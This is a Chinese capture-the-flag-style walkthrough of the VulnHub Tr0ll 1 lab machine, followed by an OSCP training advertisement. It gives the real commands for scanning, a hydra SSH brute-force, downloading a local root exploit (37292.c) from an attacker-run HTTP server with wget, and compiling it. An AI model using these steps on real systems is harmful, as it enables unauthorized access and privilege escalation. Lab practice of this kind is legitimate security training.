打靶日记 VulnHub靶机 Tr0ll 1

admin 2025年6月7日14:12:26评论1 views字数 2890阅读9分38秒阅读模式

一、将靶机导入虚拟机

下载Tr0ll 1

链接:https://pan.quark.cn/s/d8d5e9084d50

解压后在虚拟机里打开,然后网络连接改为NAT模式,或者改成自定义的VMnet8(NAT模式)

打靶日记 VulnHub靶机 Tr0ll 1

二、探测靶机IP(进行信息收集)

nmap -sS -sV -T4 192.168.253.0/24 -A

使用 -A 可以一次性获取目标主机更多的信息,如操作系统类型、开放服务的详细信息、潜在的安全漏洞等

21端口可以进行匿名登录,而且三个端口都是打开的,先去看看80端口

打靶日记 VulnHub靶机 Tr0ll 1

三、进行目录枚举

dirb http://192.168.253.138/
打靶日记 VulnHub靶机 Tr0ll 1

四、到网页进行信息收集(80端口)

直接访问进去就看到一个图片,写hey non hacker 不要黑客 problem?

打靶日记 VulnHub靶机 Tr0ll 1

看到一个secret的页面,秘密,进去就看到看到作者的嘲笑,你无能狂怒了吗

打靶日记 VulnHub靶机 Tr0ll 1

robots.txt文件里

打靶日记 VulnHub靶机 Tr0ll 1

Disallow: /secret 明确指出 /secret 目录被禁止爬虫访问,这很可能暗示该目录下存在敏感信息,比如配置文件、未公开的管理页面、数据库备份文件等。打靶过程中,这类被隐藏的内容往往是漏洞发现和权限提升的关键突破点,但这里感觉真没什么东西

dirsearch -u http://192.168.253.138/secret -e *

dirsearch 是一款用 Python 编写的开源 Web 目录扫描工具,用于在目标网站上查找隐藏的目录和文件

-u 是 dirsearch 命令中的一个参数,用于指定要扫描的目标 URL

-e 也是 dirsearch 命令的一个参数,用于指定要扫描的文件扩展名

* 是一个通配符,这里表示扫描所有可能的文件扩展名

尝试去看看secret这个目录的结果,发现有两个passwd,但是这些目录和文件都没权限去访问,全是403

打靶日记 VulnHub靶机 Tr0ll 1

在这个80端口没找到什么有用的信息,因为前面还有一个21和22端口,再去尝试

五、FTP匿名登录并Wireshark流量分析

FTP(File Transfer Protocol)即文件传输协议,是用于在网络上进行文件传输的标准协议

打靶日记 VulnHub靶机 Tr0ll 1

ftp匿名登录,匿名登录的名字写FTP或者ftp都可以,密码不用输,将在powershell上连接,直接下载在主机上,可以看到有一个.pcap的文件,可以去使用wireshark进行流量分析,然后就可以在这个Usersyzy66的目录最下面看到lol.pcap文件,然后直接拖到wireshark里进行分析

FTP 协议在传输过程中使用明文传输用户名、密码和文件内容,可以先筛选看看

打靶日记 VulnHub靶机 Tr0ll 1
打靶日记 VulnHub靶机 Tr0ll 1

发现一个用户名和密码还有传输了一个文档,然后再回去看看输入了什么其他的命令

anonymous password

登录进去看了没有什么东西

这里输入了一个LIST命令,查看这个文本文档的权限

打靶日记 VulnHub靶机 Tr0ll 1
打靶日记 VulnHub靶机 Tr0ll 1

发现这里又有一个下载文件,看到这一句话

retr:是Retrieve的缩写,在 FTP 协议里是一个命令关键字,功能是从服务器端下载指定文件到客户端

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-Pn

Sucks, you were so close... gotta TRY HARDER!n

哎呀呀,你还真是个聪明的小机灵鬼呢,你差点就找到超超级秘密文件夹啦,哈哈

真可惜,你都已经很接近了……还得再加把劲啊!

六百六十六,这里sup3rs3cr3tdirlol很像一个隐藏目录名

六、隐藏目录

确实是一个目录

这里有一个roflmao,下载下来看看,发现没有权限去执行,直接赋予权限

sudo chmod 777 roflmao
打靶日记 VulnHub靶机 Tr0ll 1
打靶日记 VulnHub靶机 Tr0ll 1

Find address 0x0856BF to proceed

找到地址 0x0856BF 以继续操作

尝试一下发现又是一个目录

打靶日记 VulnHub靶机 Tr0ll 1

进入goodluck文件夹,发现一个文本文档

打靶日记 VulnHub靶机 Tr0ll 1

这个文本文档存的应该是用户名,Definitely not this one(绝对不是这个),一般来说包是,但其实一般不是

打靶日记 VulnHub靶机 Tr0ll 1
用户名
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow

再去另一个文件夹this_folder_contains_the_password

打靶日记 VulnHub靶机 Tr0ll 1

这个Pass.txt只有一个 Good_job_:)

打靶日记 VulnHub靶机 Tr0ll 1

七、ssh爆破(hydra)

直接将这个文件下载下来

wget http://192.168.253.138/0x0856BF/this_folder_contains_the_password/Pass.txt

再将上面的用户名写到一个文档里去,我建了一个user.txt

打靶日记 VulnHub靶机 Tr0ll 1
hydra -L user.txt -P Pass.txt 192.168.253.138 ssh -v
打靶日记 VulnHub靶机 Tr0ll 1

发现没有爆破出来,到后面才知道这个要改成小写的p

大写的P 用于指定包含多个密码的文件,而 小写的p 用于指定一个单一的密码,所以说密码就是Pass.txt

六百六十六

再次尝试爆破

hydra -L user.txt -p Pass.txt 192.168.253.138 ssh -v
打靶日记 VulnHub靶机 Tr0ll 1

发现用户overflow 密码Pass.txt

八、反弹shell

反弹shell成功,这里可以切换成bin/bash

打靶日记 VulnHub靶机 Tr0ll 1

现在就进行内网的信息收集了,没看到什么东西就被踢了出来,第二次去查看版本信息

打靶日记 VulnHub靶机 Tr0ll 1

查看版本信息

uname -a 
lsb_release -a
打靶日记 VulnHub靶机 Tr0ll 1

看到ubuntu 14.04.1包有历史漏洞

九、提权

searchsploit

searchsploit ubuntu 14.04.1 Privilege

Privilege(表示提权的意思,可以提高搜索效率)

发现就一个符合,下载下来去试试

打靶日记 VulnHub靶机 Tr0ll 1
searchsploit -m 37292.c

下载好之后上传到靶机进行编译

Python 会在当前目录下启动一个 HTTP 服务器,默认端口为8000

python -m http.server
打靶日记 VulnHub靶机 Tr0ll 1

先进入临时目录,/tmp 目录一般对普通用户具有读写权限

cd /tmp
wget http://192.168.253.129:8000/37292.c

不得不说,这玩意关的真快

下载成功后进行编译

gcc -o exp 37292.c
打靶日记 VulnHub靶机 Tr0ll 1

提权成功,得到flag

打靶日记 VulnHub靶机 Tr0ll 1

END

oscp有对红队工作感兴趣,或者有意报考oscp的师傅,可以考虑一下我们的培训课程,加我微信咨询,好处如下:

1.报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看

2.200+台靶机及官方课程,lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑

3.目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频

4.加入课程可享受工作推荐机会,优秀者可内推至红队

5.报考即送送官方文档中文版,以及kali命令详解中文版,纯人工翻译,版权为团队所有

打靶日记 VulnHub靶机 Tr0ll 1

知识星球

还可以加入我们的知识星球,包含cs二开,甲壳虫,红盟工具等,还有很多src挖掘资料包

打靶日记 VulnHub靶机 Tr0ll 1
打靶日记 VulnHub靶机 Tr0ll 1
打靶日记 VulnHub靶机 Tr0ll 1

原文始发于微信公众号(泷羽Sec-临观):打靶日记 VulnHub靶机 Tr0ll 1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日14:12:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶日记 VulnHub靶机 Tr0ll 1http://cn-sec.com/archives/3782177.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息